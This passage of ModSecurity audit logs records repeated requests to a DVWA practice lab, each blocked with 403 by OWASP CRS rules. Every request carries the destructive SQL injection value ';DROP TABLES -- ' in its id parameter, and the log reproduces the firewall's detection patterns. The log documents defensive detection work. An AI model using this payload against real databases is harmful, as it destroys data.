[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":496,"p2":2723,"p3":0,"p4":0,"p5":143,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:40 --0400","transaction_id":"WRc2zH8AAQEAAAmHBJsAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":428,"p2":2183,"p3":0,"p4":0,"p5":188,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:43 --0400","transaction_id":"WRc2z38AAQEAAAmHBJwAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":413,"p2":2151,"p3":0,"p4":0,"p5":171,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:45 --0400","transaction_id":"WRc20X8AAQEAAAmHBJ0AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":432,"p2":2376,"p3":0,"p4":0,"p5":206,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:47 --0400","transaction_id":"WRc2038AAQEAAAmHBJ4AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded 